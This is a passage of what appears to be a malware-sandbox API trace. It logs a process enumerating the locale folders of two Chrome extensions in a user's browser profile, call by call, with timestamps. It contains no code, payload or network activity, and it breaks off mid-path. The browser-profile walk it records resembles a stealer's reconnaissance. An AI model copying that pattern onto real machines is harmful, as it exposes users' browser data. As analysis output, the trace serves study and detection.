lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.378] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.379] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.380] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.381] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.381] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.381] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.381] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.381] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.382] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.382] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.382] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.383] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.383] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.385] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.385] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.386] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.386] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.386] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.387] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.387] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.388] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.388] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.388] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.389] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.389] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.389] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.389] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.389] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.389] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.390] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.390] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.390] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.390] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.390] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.391] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.391] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.391] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.391] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.392] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.392] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.392] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.393] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.393] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.393] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.393] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.393] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.393] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.394] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.394] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.394] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0153.394] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0153.394] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32c28 [0153.395] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0153.395] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0153.395] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0153.395] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0153.395] FindClose (in: hFindFile=0xa32ce8 | out: hFindFile=0xa32ce8) returned 1 [0153.396] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32ce8 [0153.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\*", lpFindFileData=0x2b4dd4c | out: lpFindFileData=0x2b4dd4c) returned 0xa32c28 [0153.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32d28 [0153.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.477] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.478] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.478] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.478] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.479] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.479] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.480] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.480] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.481] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.482] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.482] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.483] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.484] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.484] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.484] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.485] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.485] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.485] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.486] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.486] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.487] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.487] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.488] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.488] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.488] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.488] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.489] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.489] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.489] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.489] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.490] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.490] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.491] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.491] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.491] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.491] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.492] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.492] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.492] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.492] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.493] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.493] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.493] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.493] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.494] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.494] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.494] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.494] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.495] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.496] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.496] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.496] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.497] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.497] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.497] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.497] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.498] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.498] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 